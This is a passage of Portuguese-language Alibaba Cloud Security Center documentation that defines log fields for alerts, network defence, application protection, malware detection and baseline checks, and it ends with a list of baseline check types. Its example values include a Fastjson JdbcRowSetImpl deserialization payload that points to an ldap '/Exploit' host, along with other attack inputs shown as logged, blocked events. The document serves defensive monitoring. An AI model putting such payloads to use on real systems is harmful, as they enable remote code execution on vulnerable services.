A fonte de dados. Valores: |
aegis_login_log |
|
detail |
Um objeto estruturado (json) fornecendo contexto detalhado do alerta. Os campos variam conforme o tipo de alerta. Valores comuns para o campo |
{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...} |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
O endereço IP público do ativo. |
39.104.XX.XX |
|
intranet_ip |
O endereço IP privado do ativo. |
192.168.XX.XX |
|
level |
O nível de risco do evento de alerta. Valores: |
suspicious |
|
name |
O nome do alerta. |
Logon Anômalo - Logon de Conta Incomum ECS |
|
operation |
A operação. Valores: |
new |
|
status |
O status do alerta. Valores: 1 (Não tratado, padrão para novos alertas); 2 (Ignorado, após executar a ação Ignorar); 8 (Na lista de permissões, após adicionar à lista de permissões); 16 (Processando, durante ações de encerrar processo/isolar arquivo/lista de permissões); 32 (Processado, após tratamento manual ou conclusão de ações de encerrar processo/isolar arquivo); 64 (Expirado, se nenhuma ação for tomada em 30 dias); 513 (Bloqueado automaticamente, o alerta foi bloqueado automaticamente pelo recurso de defesa precisa do Security Center e não requer tratamento manual). |
1 |
|
unique_info |
O identificador exclusivo do alerta. |
2536dd765f804916a1fa3b9516b5**** |
|
uuid |
O UUID do servidor onde o alerta foi gerado. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
|
suspicious_event_id |
O ID do evento de alerta. |
650226318 |
|
handle_time |
O timestamp correspondente à operação. |
1765272845 |
|
alert_first_time |
O timestamp quando o alerta apareceu pela primeira vez. |
1764226915 |
|
alert_last_time |
O timestamp quando o alerta apareceu pela última vez. |
1765273425 |
|
strict_mode |
Indica se o alerta está no modo estrito. Valores: |
true |
|
user_id |
O ID da conta. |
13583357 |
CSPM - Logs de verificação de configuração de plataforma em cloud
|
Campo |
Descrição |
Exemplo |
|
check_id |
O ID do item de verificação. Você pode obter este ID chamando a operação |
11 |
|
check_item_name |
O nome do item de verificação. |
Configuração de busca de source |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
instance_name |
O nome da instância. |
lsm |
|
instance_result |
O impacto do risco, como uma string json. |
{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]} |
|
instance_sub_type |
O subtipo da instância. Os valores dependem de |
INSTANCE |
|
instance_type |
O tipo de instância. Valores: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address). |
ECS |
|
region_id |
O ID da região onde a instância reside. |
cn-hangzhou |
|
requirement_id |
O ID do requisito. Você pode obter este ID chamando a operação |
5 |
|
risk_level |
O nível de risco. Valores: |
MEDIUM |
|
section_id |
O ID da seção. Você pode obter este ID chamando a operação |
1 |
|
standard_id |
O ID do padrão. Você pode obter este ID chamando a operação |
1 |
|
status |
O status do item de verificação. Valores: |
PASS |
|
vendor |
O provedor de services em cloud. Valor fixo: |
ALIYUN |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de defesa de rede
|
Campo |
Descrição |
Exemplo |
|
cmd |
A linha de comando do processo atacado. |
nginx: master process nginx |
|
cur_time |
O horário em que o evento de ataque ocorreu. |
2023-09-14 09:21:59 |
|
decode_payload |
O payload convertido de HEX para caracteres. |
POST /Services/FileService/UserFiles/ |
|
dst_ip |
O endereço IP do ativo atacado. |
172,16.XX.XX |
|
dst_port |
A porta do ativo atacado. |
80 |
|
func |
O tipo de evento interceptado. Valores: |
payload |
|
rule_type |
O tipo específico de regra do evento interceptado. Valores: |
alinet_payload |
|
instance_id |
O ID da instância do ativo atacado. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
O endereço IP público do ativo atacado. |
39.104.XX.XX |
|
intranet_ip |
O endereço IP privado do ativo atacado. |
192.168.XX.XX |
|
final_action |
A ação de defesa. Valor fixo: |
block |
|
payload |
O payload no formato HEX. |
504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
|
pid |
O ID do processo atacado. |
7107 |
|
platform |
O tipo de sistema do ativo atacado. Valores: |
linux |
|
proc_path |
O caminho do processo atacado. |
/usr/sbin/nginx |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
src_ip |
O endereço IP de source do ataque. |
106.11.XX.XX |
|
src_port |
A porta de source do ataque. |
29575 |
|
uuid |
O UUID do servidor. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de proteção de aplicação
|
Campo |
Descrição |
Exemplo |
|
app_dir |
O diretório onde a aplicação reside. |
/usr/local/aegis/rasp/apps/1111 |
|
app_id |
O ID da aplicação. |
6492a391fc9b4e2aad94**** |
|
app_name |
O nome da aplicação. |
test |
|
confidence_level |
O nível de confiança do algoritmo de detecção. Valores: |
low |
|
request_body |
O corpo da solicitação. |
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
|
request_content_length |
O comprimento do corpo da solicitação. |
112 |
|
data |
Os parâmetros do ponto de hook. |
{"cmd":"bash -c kill -0 -- -'31098' "} |
|
headers |
Os cabeçalhos da solicitação. |
{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...} |
|
hostname |
O nome do host ou dispositivo de rede. |
testhostname |
|
host_ip |
O endereço IP privado do host. |
172,16.XX.XX |
|
is_cliped |
Indica se o log foi truncado devido à ultrapassagem do limite de comprimento. Valores: |
false |
|
jdk_version |
A versão do JDK. |
1.8.0_292 |
|
message |
A descrição do alerta. |
Serialização de classe insegura. |
|
request_method |
O método de solicitação HTTP. |
Post |
|
platform |
O tipo de sistema operacional. |
Linux |
|
arch |
A arquitetura do sistema operacional. |
amd64 |
|
kernel_version |
A versão do kernel do sistema operacional. |
3.10.0-1160.59.1.el7.x86_64 |
|
param |
Os parâmetros da solicitação. Formatos comuns incluem parâmetros GET e application/x-www-form-urlencoded. |
{"url":["http://127.0.0.1.xip.io"]} |
|
payload |
O payload de ataque efetivo. |
bash -c kill -0 -- -'31098' |
|
payload_length |
O comprimento do payload de ataque. |
27 |
|
rasp_id |
O ID exclusivo da sonda RASP. |
fa00223c8420e256c0c98ca0bd0d**** |
|
rasp_version |
A versão da sonda RASP. |
0.8.5 |
|
src_ip |
O endereço IP do solicitante. |
172,0.XX.XX |
|
final_action |
O resultado do tratamento do alerta. Valores: |
block |
|
rule_action |
O método de tratamento de alerta especificado pela regra. Valores: |
block |
|
risk_level |
O nível de risco. Valores: |
high |
|
stacktrace |
O rastreamento de pilha. |
[java.io.FileInputStream.<init>(FileInputStream.java:123), ...] |
|
time |
O horário em que o alerta foi acionado. |
2023-10-09 15:19:15 |
|
timestamp |
O timestamp quando o alerta foi acionado, em milissegundos. |
1696835955070 |
|
type |
O tipo de ataque. Valores: |
rce |
|
url |
A URL da solicitação. |
http://127.0.0.1:999/xxx |
|
rasp_attack_uuid |
O UUID do evento de ataque. |
18823b23-7ad4-47c0-b5ac-e5f036a2**** |
|
uuid |
O UUID do host. |
23f7ca61-e271-4a8e-bf5f-165596a16**** |
|
internet_ip |
O endereço IP público do host. |
1,2.XX.XX |
|
intranet_ip |
O endereço IP privado do host. |
172,16.XX.XX |
|
sas_group_name |
O nome do grupo de servidores do Security Center. |
Group 1 |
|
instance_id |
O ID da instância do host. |
i-wz995eivg28f1m** |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Logs de detecção de arquivos maliciosos
|
Campo |
Descrição |
Exemplo |
|
bucket_name |
O nome do bucket OSS. |
***-test |
|
event_id |
O ID do alerta. |
802210 |
|
event_name |
O nome do alerta. |
Programa de mineração |
|
md5 |
O hash MD5 do arquivo. |
6bc2bc53d409b1 |
|
sha256 |
O hash SHA256 do arquivo. |
f038f95257772981e87f85 |
|
result |
O resultado da detecção. Valores: |
0 |
|
file_path |
O caminho do arquivo. |
test.zip/bin_test |
|
etag |
O identificador de arquivo OSS. |
6BC2B853D409B1 |
|
risk_level |
O nível de risco. Valores: |
remind |
|
source |
O cenário de detecção. Valores: |
OSS |
|
parent_md5 |
O hash MD5 do arquivo pai ou arquivo compactado. |
3d0f8045bb9 |
|
parent_sha256 |
O hash SHA256 do arquivo pai ou arquivo compactado. |
69b643d6a3fb859fa |
|
parent_file_path |
O nome do arquivo pai ou arquivo compactado. |
test.zip |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
|
compress_file_number |
O número sequencial do subarquivo em um arquivo compactado, no formato [atual]/[total]. Por exemplo, 1/10 significa que este é o arquivo 1 de 10 no arquivo compactado. |
1/10 |
Logs de eventos de monitoramento de arquivos críticos
|
Campo |
Descrição |
Exemplo |
|
start_time |
O horário da ocorrência mais recente do evento, em segundos. |
1718678414 |
|
uuid |
O UUID do cliente. |
5d83b26b-ba-4a-9267-12**** |
|
file_path |
O caminho do arquivo. |
/etc/passwd |
|
proc_path |
O caminho do processo. |
/usr/bin/bash |
|
rule_id |
O ID da regra correspondente. |
123 |
|
rule_name |
O nome da regra. |
file_test_rule |
|
cmdline |
A linha de comando. |
bash /opt/a |
|
operation |
A operação realizada no arquivo. |
READ |
|
risk_level |
O nível de alerta. |
2 |
|
pid |
O ID do processo. |
45324 |
|
proc_permission |
As permissões do processo. |
rwxrwxrwx |
|
instance_id |
O ID da instância. |
i-wz995eivg2**** |
|
internet_ip |
O endereço IP público. |
192.0.2.1 |
|
intranet_ip |
O endereço IP privado. |
172,16.0.1 |
|
instance_name |
O nome da instância. |
aegis-test |
|
platform |
O tipo de sistema operacional. |
Linux |
Logs de detecção sem agente
Campos comuns
|
Campo |
Descrição |
Exemplo |
|
uuid |
O UUID do servidor. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
instance_id |
O ID da instância. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
O endereço IP público do ativo. |
39.104.XX.XX |
|
intranet_ip |
O endereço IP privado do ativo. |
192.168.XX.XX |
|
sas_group_name |
O grupo de ativos do servidor no Security Center. |
default |
|
start_time |
O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu. |
1719472214 |
Campos de risco de vulnerabilidade
|
Campo |
Descrição |
Exemplo |
|
vul_name |
O nome da vulnerabilidade. |
imgsca:java:gson:AVD-2022-25647 |
|
vul_alias_name |
O alias da vulnerabilidade. |
Vulnerabilidade de problema de código gson (CVE-2022-25647) |
|
vul_primary_id |
O ID de chave primária da vulnerabilidade. |
990174361 |
|
type |
O tipo de vulnerabilidade. Valores: |
sca |
|
alert_level |
O nível de risco da vulnerabilidade. Valores: |
asap |
|
instance_name |
O nome do host. |
hhht-linux-*** |
|
operation |
A ação realizada na vulnerabilidade. Valores: |
new |
|
status |
O status da vulnerabilidade. Valores: |
1 |
|
tag |
A tag da vulnerabilidade. Valores: |
oval |
Campos de verificação de linha de base
|
Campo |
Descrição |
Exemplo |
|
check_item_name |
O nome do item de verificação. |
Defina tempo de expiração da senha |
|
check_item_level |
O nível de risco do item de verificação. Valores: |
high |
|
check_type |
O tipo do item de verificação. |
Autenticação de identidade |
|
risk_level |
O nível de risco. Valores: |
low |
|
operation |
A ação. Valores: |
new |
|
risk_name |
O nome do item de risco. |
Verificação de conformidade da política de senha |
|
status |
O status do item de verificação. Valores: |
1 |
|
sub_type_alias_name |
O alias do subtipo. |
Padrão Alibaba Cloud - Linha de base de segurança CentOS Linux 7/8 |
|
sub_type_name |
O nome do subtipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes. |
hc_centos7 |
|
type_name |
O nome do tipo de linha de base. |
hc_best_secruity |
|
type_alias_name |
O alias do tipo. |
Melhores práticas de segurança |
|
container_id |
O ID do contêiner. |
b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
|
container_name |
O nome do contêiner. |
k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Campos de amostra maliciosa
|
Campo |
Descrição |
Exemplo |
|
alert_level |
O nível de risco. Valores: |
suspicious |
|
alert_name |
O nome do alerta de amostra maliciosa. |
Processo Suspeito - Baseado em ssh |
|
operation |
A ação. Valores: |
new |
|
status |
O status de risco da amostra maliciosa. Valores: |
0 |
|
suspicious_event_id |
O ID do evento de alerta. |
909361 |
Campos de arquivo sensível
|
Campo |
Descrição |
Exemplo |
|
alert_level |
O nível de risco. Valores: |
high |
|
rule_name |
O nome do tipo de arquivo. |
Token Ionic |
|
file_path |
O caminho do arquivo sensível. |
/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
|
result |
O resultado da verificação. |
{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Apêndice
Lista de tipos e subtipos de linha de base
|
Nome do tipo |
Nome do subtipo |
Descrição |
|
hc_exploit |
hc_exploit_redis |
Exploração de ameaça de alto risco: Acesso não autorizado ao Redis |
|
hc_exploit_activemq |
Exploração de ameaça de alto risco: Acesso não autorizado ao ActiveMQ |
|
|
hc_exploit_couchdb |
Exploração de ameaça de alto risco: Acesso não autorizado ao CouchDB |
|
|
hc_exploit_docker |
Exploração de ameaça de alto risco: Acesso não autorizado ao Docker |
|
|
hc_exploit_es |
Exploração de ameaça de alto risco: Acesso não autorizado ao Elasticsearch |
|
|
hc_exploit_hadoop |
Exploração de ameaça de alto risco: Acesso não autorizado ao Hadoop |
|
|
hc_exploit_jboss |
Exploração de ameaça de alto risco: Acesso não autorizado ao JBoss |
|
|
hc_exploit_jenkins |
Exploração de ameaça de alto risco: Acesso não autorizado ao Jenkins |
|
|
hc_exploit_k8s_api |
Exploração de ameaça de alto risco: Acesso não autorizado ao servidor de API Kubernetes |
|
|
hc_exploit_ldap |
Exploração de ameaça de alto risco: Acesso não autorizado ao LDAP (Windows) |
|
|
hc_exploit_ldap_linux |
Exploração de ameaça de alto risco: Acesso não autorizado ao OpenLDAP (Linux) |
|
|
hc_exploit_memcache |
Exploração de ameaça de alto risco: Acesso não autorizado ao Memcached |
|
|
hc_exploit_mongo |
Exploração de ameaça de alto risco: Acesso não autorizado ao MongoDB |
|
|
hc_exploit_pgsql |
Exploração de ameaça de alto risco: Acesso não autorizado ao PostgreSQL |
|
|
hc_exploit_rabbitmq |
Exploração de ameaça de alto risco: Acesso não autorizado ao RabbitMQ |
|
|
hc_exploit_rsync |
Exploração de ameaça de alto risco: Acesso não autorizado ao rsync |
|
|
hc_exploit_tomcat |
Exploração de ameaça de alto risco: Vulnerabilidade de inclusão de arquivo AJP do Apache Tomcat |
|
|
hc_exploit_zookeeper |
Exploração de ameaça de alto risco: Acesso não autorizado ao ZooKeeper |
|
|
hc_container |
hc_docker |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Docker |
|
hc_middleware_ack_master |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança do nó mestre Kubernetes (ACK) |
|
|
hc_middleware_ack_node |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança do nó Kubernetes (ACK) |
|
|
hc_middleware_k8s |
Padrão Alibaba Cloud: Verificação de linha de base de segurança do mestre Kubernetes |
|
|
hc_middleware_k8s_node |
Padrão Alibaba Cloud: Verificação de linha de base de segurança do nó Kubernetes |
|
|
cis |
hc_suse 15_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade SUSE 15 |
|
hc_aliyun_linux3_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Alibaba Cloud Linux 3 |
|
|
hc_aliyun_linux_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Alibaba Cloud Linux/Aliyun Linux 2 |
|
|
hc_bind_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade Bind |
|
|
hc_centos 6_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 6 |
|
|
hc_centos 7_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 7 |
|
|
hc_centos 8_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 8 |
|
|
hc_debian_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Debian Linux 8/9/10 |
|
|
hc_iis_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade IIS |
|
|
hc_informix_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade Informix |
|
|
hc_jboss_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade JBoss |
|
|
hc_mongo_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade MongoDB |
|
|
hc_mssql_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade SQL Server |
|
|
hc_mysql_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade MySQL |
|
|
hc_nginx_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade Nginx |
|
|
hc_oracle_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade Oracle |
|
|
hc_pgsql_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade PostgreSQL |
|
|
hc_redhat 6_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Red Hat Linux 6 |
|
|
hc_redhat_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Red Hat Linux 7 |
|
|
hc_redis_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade Redis |
|
|
hc_suse 10_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade SUSE 10 |
|
|
hc_suse 12_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade SUSE 12 |
|
|
hc_suse_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade SUSE 11 |
|
|
hc_ubuntu 14_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Ubuntu 14 |
|
|
hc_ubuntu_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Ubuntu 16/18/20 |
|
|
hc_was_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade WebSphere Application Server |
|
|
hc_weblogic_djbh |
MLPS Nível 3: Verificação de linha de base de conformidade WebLogic |
|
|
hc_win 2008_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Windows 2008 R2 |
|
|
hc_win 2012_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Windows 2012 R2 |
|
|
hc_win 2016_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Windows 2016/2019 |
|
|
hc_aliyun_linux_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Alibaba Cloud Linux/Aliyun Linux 2 |
|
|
hc_centos 6_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade CentOS Linux 6 |
|
|
hc_centos 7_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade CentOS Linux 7 |
|
|
hc_debian_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Debian Linux 8 |
|
|
hc_redhat 7_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Red Hat Linux 7 |
|
|
hc_ubuntu_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Ubuntu 16/18 |
|
|
hc_win 2008_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Windows 2008 R2 |
|
|
hc_win 2012_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Windows 2012 R2 |
|
|
hc_win 2016_djbh_l2 |
MLPS Nível 2: Verificação de linha de base de conformidade Windows 2016/2019 |
|
|
hc_aliyun_linux_cis |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Alibaba Cloud Linux/Aliyun Linux 2 |
|
|
hc_centos 6_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 6 |
|
|
hc_centos 7_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 7 |
|
|
hc_centos 8_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 8 |
|
|
hc_debian 8_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Debian Linux 8 |
|
|
hc_ubuntu 14_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Ubuntu 14 |
|
|
hc_ubuntu 16_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Ubuntu 16/18/20 |
|
|
hc_win 2008_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2008 R2 |
|
|
hc_win 2012_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2012 R2 |
|
|
hc_win 2016_cis_rules |
Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2016/2019 |
|
|
hc_kylin_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade Kylin |
|
|
hc_uos_djbh_l3 |
MLPS Nível 3: Verificação de linha de base de conformidade UOS |
|
|
hc_best_security |
hc_aliyun_linux |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Alibaba Cloud Linux/Aliyun Linux 2 |
|
hc_centos 6 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança CentOS Linux 6 |
|
|
hc_centos 7 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança CentOS Linux 7/8 |
|
|
hc_debian |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Debian Linux 8/9/10 |
|
|
hc_redhat 6 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Red Hat Linux 6 |
|
|
hc_redhat 7 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Red Hat Linux 7/8 |
|
|
hc_ubuntu |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Ubuntu |
|
|
hc_windows_2008 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2008 R2 |
|
|
hc_windows_2012 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2012 R2 |
|
|
hc_windows_2016 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2016/2019 |
|
|
hc_db_mssql |
Padrão Alibaba Cloud: Verificação de linha de base de segurança SQL Server |
|
|
hc_memcached_ali |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Memcached |
|
|
hc_mongodb |
Padrão Alibaba Cloud: Verificação de linha de base de segurança MongoDB 3.x |
|
|
hc_mysql_ali |
Padrão Alibaba Cloud: Verificação de linha de base de segurança MySQL |
|
|
hc_oracle |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Oracle 11g |
|
|
hc_pgsql_ali |
Padrão Alibaba Cloud: Verificação de linha de base de segurança PostgreSQL |
|
|
hc_redis_ali |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Redis |
|
|
hc_apache |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Apache |
|
|
hc_iis_8 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança IIS 8 |
|
|
hc_nginx_linux |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Nginx |
|
|
hc_suse 15 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança SUSE Linux 15 |
|
|
tomcat 7 |
Padrão Alibaba Cloud: Verificação de linha de base de segurança Apache Tomcat |
|
|
weak_password |
hc_mongodb_pwd |
Senha fraca: Detecção de senha fraca de logon MongoDB (versão 2.x) |
|
hc_weakpwd_ftp_linux |
Senha fraca: Verifique senha fraca de logon FTP |
|
|
hc_weakpwd_linux_sys |
Senha fraca: Verifique senha fraca de logon do sistema Linux |
|
|
hc_weakpwd_mongodb 3 |
Senha fraca: Detecção de senha fraca de logon MongoDB |
|
|
hc_weakpwd_mssql |
Senha fraca: Verifique senha fraca de logon do banco de dados SQL Server |
|
|
hc_weakpwd_mysql_linux |
Senha fraca: Verifique senha fraca de logon do banco de dados MySQL |
|
|
hc_weakpwd_mysql_win |
Senha fraca: Verifique senha fraca de logon do banco de dados MySQL (Windows) |
|
|
hc_weakpwd_openldap |
Senha fraca: Verifique senha fraca de logon OpenLDAP |
|
|
hc_weakpwd_oracle |
Senha fraca: Detecção de senha fraca de logon Oracle |
|
|
hc_weakpwd_pgsql |
Senha fraca: Verifique senha fraca de logon do banco de dados PostgreSQL |
|
|
hc_weakpwd_pptp |
Senha fraca: Verifique senha fraca de logon do service pptpd |
|
|
hc_weakpwd_redis_linux |
Senha fraca: Verifique senha fraca de logon do banco de dados Redis |
|
|
hc_weakpwd_rsync |
Senha fraca: Verifique senha fraca de logon do service rsync |
|
|
hc_weakpwd_svn |
Senha fraca: Verifique senha fraca de logon do service SVN |
|
|
hc_weakpwd_tomcat_linux |
Senha fraca: Verifique senha fraca do console Apache Tomcat |
|
|
hc_weakpwd_vnc |
Senha fraca: Verifique senha fraca do VNC Server |
|
|
hc_weakpwd_weblogic |
Senha fraca: Detecção de senha fraca de logon WebLogic 12c |
|
|
hc_weakpwd_win_sys |
Senha fraca: Verifique senha fraca de logon do sistema Windows |